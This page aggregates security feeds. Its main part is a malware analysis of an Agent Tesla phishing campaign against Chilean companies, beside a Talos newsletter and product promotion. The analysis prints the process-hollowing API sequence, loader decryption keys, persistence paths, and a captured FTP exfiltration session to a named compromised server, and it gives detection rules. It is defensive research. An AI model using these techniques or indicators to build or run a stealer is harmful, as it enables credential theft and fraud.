Welcome to this week’s edition of the Threat Source newsletter. 

Many solutions have been proposed to reduce software bugs: zero-defect mandates, pair programming, formal methods, and mathematical software proofs. The reality is that software engineering is hard. Identifying and fixing bugs before they make it into production code is hard. Source code peer review and extensive unit testing have improved code quality, but bugs still get through. 

Not every bug is a vulnerability, and not every fault that appears to be a vulnerability can be usefully exploited. Nevertheless, through extensive testing and review, a skilled vulnerability researcher can still uncover faults in software that has already undergone rigorous quality assurance. However, skilled vulnerability researchers are a scarce resource and can only review so much software. 

AI is the great hope for improving software quality. Iterative improvements in AI’s ability to find bugs mean that each new version of these systems is better than the last. We’re now at the point where AI, although still not as good as a skilled vulnerability researcher, can scan code to find errors at a scale and speed that human analysis cannot match. Used well, it can identify potential vulnerabilities before they reach production. 

In the long term, this is very good news. Better automated review and analysis of software is how we will improve code quality. However, in the short term, decades of technical debt and latent errors will be uncovered and will need to be addressed. To make things more complex, threat actors will have access to these same tools to search for exploitable vulnerabilities for their own ends. 

The result is likely to be a surge in patches. More vulnerabilities discovered means more fixes released, placing additional pressure on already stretched operations teams. Many of these patches will be urgent; some will address vulnerabilities that are being actively exploited. Without proper planning, the volume of fixes may outpace an organization’s capacity to deploy them.

The surge of patches has yet to happen, but the first signs may already be visible. Now is an excellent time to consider how you prioritise patching, apply patches at scale, and manage systems that cannot be patched quickly — or at all. We can reflect on these questions now, and improve our processes, or we can flounder when the surge of patches arrives. Either way, ready or not, the time of much patching is coming. 

The one big thing 

In Cisco Talos’ latest blog, we outline the differences between responding to state-sponsored threat actors and handling commodity ransomware. These advanced adversaries log in using valid credentials and leverage your own trusted tools to remain invisible for months. Because their primary objectives are long-term espionage and pre-positioning rather than immediate financial gain, standard incident response playbooks are entirely inadequate.  

Why do I care? 

State-sponsored actors operate inside your trust boundary and aim to remain completely undetected. They have the patience and resources to map your infrastructure, exploit supply chain vulnerabilities, and blend their lateral movement into routine administrative tasks. If your security architecture assumes internal traffic is inherently trustworthy, these adversaries will exploit that gap to establish deep, persistent access across both IT and operational technology environments. Prematurely containing these threats can even tip off the attacker, causing you to lose critical intelligence and the chance to fully eradicate their foothold.

So now what? 

Shift to a zero trust architecture that continuously verifies access and plans for inevitable failures, starting with maximizing your visibility through centralized log aggregation and enabling Windows command-line and PowerShell script block logging. Prioritize identity management by enforcing multi-factor authentication on all administrative accounts and implementing a tiered access model. Update your incident response playbooks to specifically address living-off-the-land techniques, supply chain compromises, and the complex operational timing required for state-sponsored containment. Read the blog here for more information. 

Top security headlines of the week 

Linux bitten by second severe vulnerability in as many weeks 
The leaked exploit is deterministic, meaning it works precisely the same way each time it’s run and across different Linux distributions. It causes no crashes, making it stealthy to run. Install patches immediately. (Ars Technica) 

A DOD contractor’s API flaw exposed military course data and service member records 
The issue affected Schemata, an AI-powered virtual training platform used in military and defense settings. According to Strix, an ordinary low-privilege account was able to access data across multiple tenants. (CyberScoop) 

Fake OpenAI Privacy Filter repo hits No. 1 on Hugging Face, draws 244K downloads 
A malicious repository managed to take a spot in the platform’s trending list by impersonating OpenAI’s Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users. (The Hacker News) 

TanStack, Mistral AI, UiPath hit in fresh supply chain attack 
The same as in previous campaigns, the worm targets sensitive information, including developer credentials, API keys, tokens, cloud credentials and secrets, cryptocurrency wallets, and more. (SecurityWeek) 

Official CheckMarx Jenkins package compromised with infostealer 
Checkmarx warned over the weekend that a rogue version of its Jenkins Application Security Testing (AST) plugin had been published on the Jenkins Marketplace. (BleepingComputer) 

Can’t get enough Talos? 

Breaking things to keep them safe with Philippe Laulheret 
From his memorable experiment using a green onion to bypass a biometric fingerprint reader to his experience on the frontlines of cybersecurity, Philippe shares the journey that led him to vulnerability research. 

Inside the SOC: AI-powered DNS defense against ransomware 
Learn how Cisco Talos’ advanced AI-driven detection, including domain generation algorithm (DGA) analysis, integrates within Cisco Secure access to proactively identify and predict malicious domains. 

Clustering and reuse of phone numbers in scam emails 
Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.   

Upcoming events where you can find Talos 

• OffensiveCon (May 15 – 16) Berlin, Germany 
• Cisco Live U.S. (May 31 – June 4) Las Vegas, Nevada 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Example Filename: VID001.exe  
Detection Name: Win.Worm.Coinminer::1201** 

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974  
MD5: aac3165ece2959f39ff98334618d10d9  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974  
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe  
Detection Name: W32.Injector:Gen.21ie.1201 

SHA256: e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba  
MD5: dbd8dbecaa80795c135137d69921fdba  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba  
Example Filename: u112417.dat  
Detection Name: W32.Variant:MalwareXgenMisc.29d4.1201 

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59  
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59  
Example Filename: APQ9305.dll  
Detection Name: Auto.90B145.282358.in02

Cisco Talos Blog – ​Read More

Credential theft malware rarely announces itself with ransomware-level noise. Instead, it operates like a silent siphon hidden inside everyday business workflows: invoices, payroll files, purchase orders, procurement requests. Agent Tesla campaigns are especially dangerous because they target the operational arteries of organizations, harvesting credentials that enable deeper compromise, business email compromise (BEC), financial fraud, cloud account takeover, and long-term espionage. 

Key Takeaways 

• Agent Tesla remains highly effective in LATAM due to cheap licensing and easy configuration combined with region-specific social engineering. 

• Multi-stage loaders using .NET Reactor 6.x and Process Hollowing evade most static detection tools. 

• Financial and procurement departments are high-priority targets through purchase order and payroll-themed lures. 

• Compromised legitimate infrastructure (e.g., Romanian FTP servers) complicates blocking and attribution. 

• Fileless execution and cleartext FTP exfiltration make dynamic sandbox analysis essential. 

• The campaign has maintained the same C2 infrastructure for at least 18 months, indicating sustained, professional operations. 

• Organizations can significantly improve defenses through interactive sandboxing, targeted awareness training, and outbound FTP monitoring. 

This investigation reveals an active Agent Tesla campaign specifically targeting Chilean and broader LATAM enterprises through procurement-themed phishing lures. The malware chain combines social engineering, obfuscated loaders, process hollowing, fileless execution, and FTP-based credential exfiltration to evade traditional defenses.

For organizations, the business impact extends far beyond a single infected endpoint: stolen browser, VPN, email, and FTP credentials can become the entry point for supply chain compromise, lateral movement, and unauthorized access to sensitive corporate systems.

Threat Overview: Agent Tesla in the LATAM Context 

Latin America has become an increasingly attractive target for commodity malware operators. The combination of rapid digitalization, growing SME supply chains, and historically lower security maturity makes the region fertile ground for credential stealers. Among these, Agent Tesla consistently ranks as one of the most deployed families — cheap to license, easy to configure, and devastatingly effective against organizations with limited email security controls. 

In March 2026, during routine threat hunting, we identified a malware sample delivered inside a RAR archive named Orden de compra_pdf.uu — Spanish for ‘purchase order’ — a social engineering lure specifically crafted for the Chilean and broader LATAM business environment. What followed was a multi-day investigation that uncovered not just a single sample, but a persistent infrastructure that has been quietly exfiltrating credentials from LATAM enterprises since at least mid-2024. 

Agent Tesla is a .NET-based keylogger and credential stealer, commercially sold as a ‘Remote Administration Tool’ since 2014. Despite its age, it remains highly active because operators can purchase access cheaply and configure it through a GUI without programming knowledge. Its primary capabilities include: 

• Credential theft — browsers (Chrome, Firefox, Edge), email clients (Outlook, Thunderbird), FTP clients; 
• Keylogging — captures all keystrokes in real time; 
• Screenshot capture — periodic desktop screenshots;
• Clipboard monitoring — intercepts copied passwords and crypto wallet addresses; 
• Exfiltration channels — SMTP, FTP, HTTP, or Telegram bot API. 

In the LATAM context, Agent Tesla operators typically use spear-phishing lures themed around business documents: purchase orders, payment receipts, payroll files, and invoices. This campaign follows that pattern precisely, targeting the financial and procurement workflows of Chilean companies. 

Business Impact: Why Agent Tesla Is a Serious Enterprise Threat 

While Agent Tesla is often categorized as a “commodity stealer,” the operational impact on organizations can be severe. In many environments, credential theft creates the conditions for larger and more expensive incidents. 

Financial Fraud and Business Email Compromise 

The campaign specifically impersonates procurement and finance-related documents, indicating deliberate targeting of employees who routinely handle invoices, payment approvals, supplier communications, and payroll operations. Once email credentials are stolen, attackers can hijack ongoing financial conversations, redirect payments, or conduct BEC attacks that appear fully legitimate.  

Supply Chain Exposure 

Compromised FTP, VPN, and email accounts may provide indirect access to suppliers, logistics providers, distributors, and partner organizations. This creates a multiplier effect where a single infection can propagate trust-based compromise across the wider business ecosystem. 

Cloud and SaaS Account Takeover 

Modern browsers store credentials for cloud platforms, CRMs, collaboration tools, and internal portals. Theft of browser credential databases can therefore expose Microsoft 365, Google Workspace, Salesforce, SAP, and other critical business systems without the attacker needing to deploy ransomware or exploit vulnerabilities. 

Long-Term Persistence and Espionage 

Agent Tesla’s keylogging, clipboard interception, and screenshot functionality enable prolonged surveillance of employee activity. This allows operators to collect sensitive information gradually over time, including contracts, credentials, API keys, internal communications, and financial data. 

Risk Summary: A single employee opening a convincing purchase order email can result in complete credential compromise across your organization’s digital tools. This campaign has operated undetected against LATAM businesses for over 18 months. The financial and operational cost of remediation significantly exceeds the cost of proactive prevention. 

This article walks through the full investigation methodology, from initial triage to infrastructure correlation, and demonstrates how ANY.RUN’s interactive sandbox and threat intelligence capabilities accelerated key phases of the analysis.  

The full detonation session is publicly available in the sandbox.  

Campaign Technical Analysis

1. Initial Triage: The Malicious RAR Archive 

Sample Identification 

The investigation began with a RAR v5 archive submitted for analysis. Key static properties: 

The file extension .uu is a deliberate obfuscation tactic. While the file is actually a RAR archive, the unusual extension is intended to confuse automated scanners and reduce detection rates on email gateways that rely on extension-based filtering. 

The Social Engineering Angle 

The filename Orden de compra_pdf.uu translates to ‘Purchase order PDF’ in Spanish. This is a high-value lure for B2B environments: purchase orders are expected, frequently shared by email, and often opened without scrutiny by accounts payable and procurement personnel. The ‘_pdf’ substring creates a false sense of legitimacy, suggesting the recipient will open a PDF document. 

This social engineering pattern is consistent across the 80+ samples we identified communicating with the campaign’s infrastructure –  all impersonating financial or procurement documents in Spanish: 

• Nómina de sueldos.pdf_008.exe — payroll; 
• Comprobante de pago.pdf.exe — payment receipt; 
• Nomina_Sept2025_Confidencial.xlam — confidential payroll; 
• Orden de Compra.xlam — purchase order (macro-enabled spreadsheet); 
• OC 20240814.xlam / OC 20240813.xlam — dated order confirmations. 

2. Kill Chain Analysis 

Stage 1 — JScript Encoded Dropper 

WinRAR extracts the archive to reveal Orden de compra_pdf.jse — a JScript Encoded Script (Microsoft Script Encoder format). This encoding is not true encryption, but is highly effective at bypassing signature-based AV detection and preventing casual inspection. The file is executed via Windows Script Host (wscript.exe). 

The .jse dropper performs several actions in sequence: 

• Downloads a decoy PDF from a remote server and opens it to distract the victim while infection proceeds silently in the background. 

• Drops multiple PowerShell stager scripts to C:Temp with randomized names (AYRMWWFH.ps1, Z2KBLYG5.ps1, ELHYLTLT.ps1). 

• Invokes PowerShell with execution policy bypass —  -ExecutionPolicy Bypass-  to run the stagers without triggering security warnings. 

• Modifies registry keys for persistence. 

All PowerShell stager scripts dropped during the campaign share the same SHA256 hash (96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7), confirming use of a standardized stager template across the campaign.

Stage 2 — PowerShell Stager 

The PowerShell stager loads ALTERNATE.dll — the Agent Tesla loader — and injects it into a legitimate Microsoft binary. The choice of injection target is deliberate: aspnet_compiler.exe is a trusted .NET Framework component, and its network activity is rarely flagged by endpoint security tools. 

The stager implements a Process Hollowing injection sequence: 

1. Locate aspnet_compiler.exe on disk 

2. Spawn a suspended process instance 

3. VirtualAllocEx() → allocate memory in target process 

4. WriteProcessMemory() → write ALTERNATE.dll payload 

5. GetProcAddress() → resolve entry point dynamically 

6. Resume execution → Agent Tesla runs inside trusted process 

Stage 3 — ALTERNATE.dll: The Protected Loader 

The DLL is named ALTERNATE.dll internally (with a matching ALTERNATE.pdb debug path left in the binary). Static analysis with Detect-It-Easy reveals a sophisticated protection stack: 

The use of .NET Reactor 6.x explains why standard tools like de4dot fail without additional flags. The correct tool for this protection version is NETReactorSlayer: 

# Recommended approach: 
NETReactorSlayer.CLI.exe --no-pause ALTERNATE.dll 

# Alternative with de4dot (force detector): 
de4dot.exe ALTERNATE.dll --det reactor 

Partial deobfuscation via NETReactorSlayer reduced the binary from 79,872 → 42,496 bytes (a 46.8% reduction), confirming that nearly half the original file consisted purely of protection scaffolding. Post-deobfuscation entropy dropped from 6.0 → 5.86, and previously hidden IL structures became accessible for analysis. 

Internal Architecture (Post-Deobfuscation) 

Analysis of the partially deobfuscated binary (alternate_Slayed.dll) reveals the loader’s true internal architecture. Method names remain obfuscated (smethod_10, Delegate10, Struct10) — a pattern consistent with automated obfuscation frameworks — but the functional structure is now recoverable. 

The loader implements a Read → Decrypt → Decompress → Execute pipeline: 

[ALTERNATE.dll Loader] 
        ↓ 
1. Read encrypted blob from embedded resource 
        ↓ 
2. Decrypt  →  RijndaelManaged (AES-256) + CryptoStream 

                   Key: hardcoded hex constant 

                   IV:  prepended to blob (first 16 bytes) 
        ↓ 
3. Decompress  →  System.IO.Compression (DeflateStream) 
        ↓ 
4. Load  →  Reflection (Assembly.Load from byte array) 

               ResolveMethod / GetMethod / CreateInstance 
        ↓ 

5. Invoke  →  DynamicMethod / CreateDelegate 

        ↓ 
6. Execute  →  Agent Tesla payload runs entirely in memory 

Encryption Layer

The loader uses RijndaelManaged (the .NET implementation of AES) with CryptoStream and explicit set_IV calls, confirming AES-CBC mode with a hardcoded key and a prepended IV. Four 256-bit (32-byte) key candidates were identified in the deobfuscated binary:

D5B7247C497788CF0031CEB06E3DF77A45FEF59F1E49633DC7159816D64759B5 

C61B1941CF756EB7551F7C661743802362728B785ADC22E860D269713DFB01A6 

C356AFF1A01C2B0DA472E584C8E3C8F875B9A24280435D42836A77B19F5A8C18 

F1C3EBE78BD8C38559BF3CFCC9A9FA37D221E31780774A3787E26160A61F5348 

The encrypted payload blob is located at offset 0x4600 in the deobfuscated binary (relocated from 0x12000 in the original), measures 2,560 bytes, and retains maximum entropy of 7.93 / 8.0, confirming the AES encryption survived deobfuscation intact. 

Dynamic Execution via Reflection

The loader avoids static linking of the final payload by using .NET Reflection to load and invoke Agent Tesla entirely from a byte array in memory. The relevant APIs observed post-deobfuscation:

Process Hollowing — Full Win32 API Map 

The deobfuscated binary exposes the complete Process Hollowing implementation as UTF-16 P/Invoke strings. The API sequence is a textbook 32-bit hollowing with Wow64 support for 32→64-bit environments: 

The hollower contains hardcoded error strings —“Failed to allocate memory”, “Failed to unmap section”, “Failed to update PEB”— suggesting it was built from a reusable hollowing template with debug output preserved, a common trait in commodity malware kits. 

Execution Control Flags 

Three internal execution control strings were recovered post-deobfuscation: ALTERNATE, EXECUTE, and LAUNCH. These likely govern different execution paths within the loader — for example, switching between in-process shellcode execution and remote process hollowing depending on runtime conditions such as privilege level or AV detection. 

Stage 4 — Agent Tesla Deployed In-Memory 

The Agent Tesla payload is stored as a 2,560-byte AES-encrypted and deflate-compressed blob embedded in the loader’s .text section. The double-layering — compressed and then encrypted — ensures the payload has no recognizable structure at rest and defeats both signature and entropy-based detection. 

At runtime, the loader decrypts the blob using the hardcoded key and embedded IV, decompresses the result with DeflateStream, then uses Assembly.Load() to instantiate Agent Tesla directly from the resulting byte array in memory. No file is written to disk at any stage from this point forward — the execution is entirely fileless.

3. Payload Analysis: Agent Tesla Unpacked

Memory dumps captured during sandbox execution allowed recovery of the fully decrypted Agent Tesla payload — the binary that runs inside the hollowed aspnet_compiler.exe process. Static analysis of this dump (270,336 bytes, SHA256: 43d09743a69c9afa7156bf4e2bf7423b3d5f5ad7d54c4c3fb8a698d526778057) reveals the complete capability set and hardcoded configuration of this Agent Tesla instance.

Hardcoded Configuration

With the payload decrypted, the complete operator configuration is visible in plaintext — the same values that were hidden behind AES-256 in the loader stage:

The FTP password recovered from the memory dump matches exactly the credentials captured in cleartext by ANY.RUN during the dynamic analysis phase, providing cross-validation between static payload analysis and live network capture.

Credential Theft Capabilities

The unpacked payload targets over 80 applications across six categories, representing one of the broadest credential theft surface areas among commodity stealers:

Keylogger

The payload implements a full system-wide keylogger via Windows hook APIs. 26 special keys are mapped to labeled tokens for inclusion in keylog reports:

{ALT+F4}  {ALT+TAB}  {BACK}  {CAPSLOCK}  {CTRL}  {DEL}
{END}  {ENTER}  {ESC}  {F10}  {F11}  {F12}
{HOME}  {Insert}  {KEYDOWN}  {KEYLEFT}  {KEYRIGHT}  {KEYUP}
{NumLock}  {PageDown}  {PageUp}  {TAB}  {Win}
 
Keylogger interval: configurable via KeyloggerInterval field
Output field:       KeylogText (appended per session)

Additional Capabilities

Clipboard Monitoring
Agent Tesla registers a SetClipboardViewer / ChangeClipboardChain hook to intercept clipboard content in real time. Captured data is tagged with <br><hr>Copied Text: <br>and appended to the exfiltration report. This is particularly effective for capturing copied passwords, API keys, and cryptocurrency wallet addresses.

Screenshot Capture
A configurable screenshot module captures periodic desktop images. The interval is controlled by the KeyloggerInterval setting. Screenshots are base64-encoded and included in the HTML exfiltration report alongside stolen credentials.

Persistence Mechanisms

The payload supports multiple persistence methods, selectable at build time:

• Registry Run key — HKCUSoftwareMicrosoftWindowsCurrentVersionRun[StartupRegName];
• Startup folder — copies itself to %APPDATA%MicrosoftWindowsStart MenuProgramsStartup ;
• Task Scheduler — creates a scheduled task for persistence without registry artifacts;
• GUID-named copy — drops as 7bcd610d-7af6-4dc2-875b-dc4fec91463c.exe to blend with system files.

Anti-Analysis / Anti-VM

The payload performs environment checks before proceeding, scanning for indicators of analysis environments:

Exfiltration Report Format

The HTML report generated by Agent Tesla and uploaded to the FTP drop server follows a fixed template, reconstructed from the payload strings. The format observed in the ANY.RUN network capture matches exactly:

Time: [MM/dd/yyyy HH:mm:ss]
User Name: [Windows username]
Computer Name: [hostname]
OSFullName: [Windows edition]
CPU: [processor model from WMI Win32_Processor]
RAM: [available RAM in MB]
<hr>
Host: [URL where credentials were stolen from]
Username: [stolen username]
Password: [stolen password]
Application: [browser/client name]
<hr>
[...additional credential blocks...]
<hr>Copied Text: [clipboard contents]

This template is hardcoded in the payload and has remained consistent across multiple Agent Tesla v3 builds observed in LATAM campaigns. The ‘Time:’ field uses MM/dd/yyyy format, which combined with the Spanish-language lures, suggests the operator targets both English and Spanish-speaking environments.

4. Dynamic Analysis: Behavioral Confirmation

Detonating the full infection chain in ANY.RUN’s Interactive Sandbox provided behavioral confirmation of the attack and captured artifacts that static analysis alone could not reveal.

Process tree

The full process execution chain observed in the sandbox:

• WinRAR.exe (PID 8100) → extracts .jse dropper;
• wscript.exe (PID 2392) → executes .jse, drops PS1 stagers, downloads decoy PDF;
• powershell.exe (×4: PIDs 4600, 6116, 6240, 6412) → stager execution with bypass;
• aspnet_compiler.exe (PID 7720) → hollowed process – executes Agent Tesla payload.

Pre-Exfiltration: Victim Fingerprinting

Before exfiltrating stolen data, Agent Tesla performs a geolocation and hosting provider check via ip-api[.]com. This common stealer pattern verifies the victim is not running inside a sandbox or corporate proxy before proceeding with exfiltration:

GET http://ip-api.com/line/?fields=hosting HTTP/1.1
Host: ip-api.com
 
→ Response: false  (victim is not a hosting provider)
→ Agent Tesla proceeds with exfiltration

ANY.RUN flagged this request with the Suricata rule: “ET MALWARE Common Stealer Behavior — Source IP Associated with Hosting Provider Check via ip-api.com”, confirming the pre-exfiltration fingerprinting behavior.

Credential Theft

The sandbox confirmed active credential theft from web browsers. The behavioral indicators observed:

• Accesses Chrome and Firefox browser profile directories and credential store databases;
• Reads saved password and autofill data;
• Formats captured credentials as HTML report for exfiltration;
• Collects system fingerprint: hostname, username, OS version, CPU model, RAM.

FTP Exfiltration

The most critical finding from dynamic analysis was the capture of cleartext FTP credentials and exfiltration traffic. FTP operates without transport encryption by default, making the full authentication handshake and data transfer visible in the network capture:

220 Welcome to Pure-FTPd [privsep] [TLS]
331 User americas2@horeca-bucuresti.ro OK. Password required
USER americas2@horeca-bucuresti.ro
PASS [REDACTED]
230 OK. Current restricted directory is /
STOR PW_admin-DESKTOP-JGLLJLD_2026_03_27_17_19_15.html
226 File successfully transferred (3.79 KB/s)

The exfiltrated file follows a consistent naming convention: PW_[username]-[hostname]_[timestamp].html. This structured naming allows the operator to efficiently process stolen credentials from multiple victims in the drop directory.

The following Suricata rules fired during the exfiltration phase:

• ET MALWARE AgentTesla Exfil via FTP
• ET MALWARE Agent Tesla CnC Exfil via TCP
• STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) (×2)
• SUSPICIOUS [ANY.RUN] Possible admin username observed in outbound connection
• HUNTING [ANY.RUN] Windows PC hostname observed in outbound connection
• HUNTING [ANY.RUN] Host CPU Enumeration observed in outbound connection

5. Threat Infrastructure Analysis

The C2 Server: 89.39.83.184

The exfiltration target — ftp.horeca-bucuresti[.]ro resolving to 89[.]39[.]83[.]184 — is a legitimate Romanian hospitality business website that has been compromised and repurposed as a drop zone. This operational security tactic makes network blocking harder and attribution more difficult, since blocking the IP may affect a legitimate business.

Querying the IP on VirusTotal reveals 80 malicious files that have communicated with this server, with the earliest samples dating to September 2024 — confirming the infrastructure has been actively maintained for at least 18 months.

Campaign Scope: A LATAM-Focused Operation

Analysis of the 80 samples communicating with this infrastructure reveals a clear targeting pattern focused on Spanish-speaking Latin American enterprises. Pivoting on the campaign in ANY.RUN Threat Intelligence Lookup with the query submissionCountry:”cl” AND threatLevel:”malicious” confirms Chile as the primary submission country, and surfaces correlated behavioral artifacts including the mutex localsm0:6816:304:wilstaging_02, the Firebase Storage decoy PDF download URL, and all 10 Suricata network threats – all tied to aspnet_compiler.exe as the injected process.

The filenames observed in the communicating files paint a consistent picture:

The Passive DNS history further reveals that the same IP hosted subdomains used as email relay infrastructure: email.v.todotramitesperu.com.elgartizocon[.]ro and email.elrif[.]com — patterns consistent with mail relay abuse to increase phishing email deliverability.

6. MITRE ATT&CK Mapping

Early Detection: Using ANY.RUN Against Agent Tesla Campaigns

ANY.RUN’s Interactive Sandbox is particularly effective for early detection of sophisticated multi-stage loaders like this Agent Tesla campaign. Security teams should integrate the following practices:

• Proactive Sample Submission: Upload suspicious attachments (especially RAR archives with non-standard extensions like .uu, .jse, or macro-enabled Office files) immediately upon receipt for interactive analysis.
• Behavioral Monitoring: Use ANY.RUN’s real-time process tree visualization and Suricata rule matching to identify Process Hollowing into aspnet_compiler.exe, PowerShell stagers, and FTP exfiltration patterns.
• Threat Intelligence Pivoting: After identifying a C2 indicator (e.g., ftp.horeca-bucuresti[.]ro or IP 89.39.83[.]184), pivot within ANY.RUN Threat Intelligence to uncover related samples and campaign scope.
• Team Training: Conduct regular red-team exercises in the interactive environment to train analysts on recognizing .NET Reactor-protected loaders and fileless execution techniques.
• Automated Workflows: Integrate ANY.RUN via API for high-volume email gateway triage, enabling rapid quarantine of matching threats before they reach end users.

Detection Recommendations

Network-Level (Suricata/Snort)

# Detect AgentTesla FTP exfiltration by filename pattern
alert tcp $HOME_NET any -> $EXTERNAL_NET 21 (
  msg:"AgentTesla FTP Credential Exfil - PW_ prefix";
  flow:established,to_server;
  content:"STOR PW_"; depth:8;
  content:".html";
  sid:9000001; rev:1;
)
 
# Detect pre-exfil hosting check
alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"AgentTesla - ip-api hosting provider check";
  http.uri; content:"/line/?fields=hosting";
  sid:9000002; rev:1;
)

YARA Rule

rule AgentTesla_ALTERNATE_Loader {
  meta:
    description = "Detects ALTERNATE.dll Agent Tesla loader (.NET Reactor 6.x)"
    author      = "0xOlympus"
    date        = "2026-03-27"
  strings:
    $pdb  = "ALTERNATE.pdb"  ascii
    $name = "ALTERNATE.dll"  ascii
    $aes  = "AesCryptoServiceProvider" wide
    $dec  = "CreateDecryptor"          wide
    $va   = "VirtualAlloc"   ascii
    $wpm  = "WriteProcessMemory" ascii
  condition:
    uint16(0) == 0x5A4D
    and all of ($pdb, $name)
    and all of ($aes, $dec)
    and any of ($va, $wpm)
}

Sigma Rule

title: AgentTesla Process Hollowing via aspnet_compiler.exe
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: "\powershell.exe"
    Image|endswith:       "\aspnet_compiler.exe"
  filter_legit:
    CommandLine|contains:
      - "-f "
      - "-v "
  condition: selection and not filter_legit
falsepositives:
  - Legitimate .NET compilation tasks (rare outside dev environments)
level: high
tags:
  - attack.t1055.012
  - attack.t1059.001

Email Gateway Recommendations

Block or quarantine emails containing attachments matching these patterns:

• Extensions .uu, .jse, .vbe inside archives;
• Macro-enabled Office files (.xlam, .xlsm) from external senders in procurement contexts;
• Filename patterns combining financial terms (orden, nomina, comprobante) with executable extensions.

Important Observations

This investigation yields several actionable findings for security teams in Chile and the broader LATAM region:

The campaign is persistent, not opportunistic

The threat actor has operated continuously since at least mid-2024 using the same FTP infrastructure (89.39.83[.]184) while iterating on lure documents. This is a sustained operation with deliberate LATAM focus.

Dynamic analysis is non-negotiable for this family

.NET Reactor 6.x with virtualization and control flow obfuscation significantly raises the cost of static analysis. Organizations relying solely on static AV will miss this family. Dynamic analysis in sandboxes like ANY.RUN provides the detection coverage that static tools cannot.

FTP exfiltration remains dangerously undermonitored

Despite being a decades-old protocol, FTP exfiltration continues to succeed because most organizations focus monitoring on HTTP/S. Since FTP operates in cleartext, when it is captured, full credentials and data content are visible — but only if outbound FTP traffic is logged and inspected.

Financial and procurement roles are high-value targets

The consistent use of purchase order and payment receipt lures indicates deliberate targeting of accounts payable and procurement departments. Targeted security awareness training for these roles represents a high-ROI defensive investment.

How ANY.RUN Accelerated This Investigation

Several phases of this investigation would have been significantly slower or impossible without ANY.RUN. Here is where the platform made a direct impact:

Interactive Detonation

Unlike fully automated sandboxes, ANY.RUN’s interactive environment allowed real-time observation of the infection chain. This was critical for the .jse stage, which checks for user interaction before proceeding — a common evasion technique that automated systems fail to bypass.

Automatic Network Threat Detection

ANY.RUN matched 6 Suricata rules against the network traffic automatically, immediately confirming the Agent Tesla family and the FTP exfiltration behavior. In a traditional lab setup, this would require manual PCAP capture, Wireshark analysis, and custom rule development.

Cleartext FTP Capture

The cleartext FTP session — including the authentication handshake, the C2 hostname (ftp.horeca-bucuresti[.]ro), and the exfiltrated filename pattern — was captured in full by ANY.RUN’s network interception layer and presented directly in the Network tab, reducing analysis time from hours to minutes.

Threat Intelligence Pivoting

Using the C2 IP as a pivot point in ANY.RUN Threat Intelligence (combined with VirusTotal), we surfaced 80 related malicious samples, identified the 18-month campaign timeline, and mapped the full scope of LATAM targeting — transforming a single sample investigation into a comprehensive campaign report.

Appendix: Complete IOC Reference

About ANY.RUN 

ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. They help security teams understand threats faster, make informed decisions, and operationalize threat intelligence across detection, investigation, and response workflows. 

The company’s solutions include Interactive Sandbox for enterprise-grade malware analysis, as well as ANY.RUN’s Threat Intelligence with its modules Threat Intelligence Lookup and Threat Intelligence Feeds, providing continuously updated intelligence based on live attack analysis. 

Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN is SOC 2 Type II certified, ensuring strong security controls and protection of customer data. 

Request access to ANY.RUN’s solutions →  

The post LATAM Under Siege: Agent Tesla’s 18-Month Credential Theft Campaign Against Chilean Enterprises appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Successful SOC operations require more than accurate detections. Instant access to context, clear conclusions, and operationally relevant insights allow incidents to move across workflows without delays: 

• During alert triage, analysts need a quick threat overview to decide on the next steps. 

• Efficient incident response decisions demand clear, actionable context to rely on. 

• Swift incident reporting requires cross-tier visibility without the need for manual processing of raw technical data. 

Making ANY.RUN’s Interactive Sandbox a part of your standard SOC workflow helps eliminate bottlenecks that occur along the incident lifecycle by contributing to the optimization of each process, decision, and report. 

SOC-ready Tier 1 reports turn complex sandboxing analysis into structured, decision-ready intelligence for faster, efficient triage, escalation, response, and reporting. 

Executive Summary 

• Whether operating as an internal SOC or delivering MDR and MSSP services, organizations need investigation workflows that scale efficiently under growing alert volumes. 

• ANY.RUN’s Interactive Sandbox with Tier 1 Reports helps standardize triage, escalation, and incident reporting by becoming a decision-support layer for your security operations. 

• Enterprise Suite teams can optimize sandbox investigations and reporting across the SOC at scale with unlimited Tier 1 report generation. 

• The result is faster investigations, consistent escalations with less context lost, and optimized incident documentation for confident decisions and risk prioritization. 

Challenges SOC Teams Face Today  

With SOC teams continuously investigating suspicious files, URLs, phishing pages, and malware samples, turning the resulting massive volume of technical findings into actionable operational context fast enough to support efficient response becomes the key challenge. 

The lack of standardized reporting leads to: 

• Slow triage due to excessive manual work for Tier 1 

• Higher pressure on Tier 2/3 and incident response team due to lack on ready-to-apply context  

• Context loss during escalations and critical delays occur 

• Additional burden falling on SOC managers without clear visibility into incident severity and business impact 

ANY.RUN’s Interactive Sandbox already simplifies malware and phishing analysis through interactive, real-time investigation. Now, with Tier 1 Reports and AI Summary, it supports decision-making and reporting acrossSOC operations. 

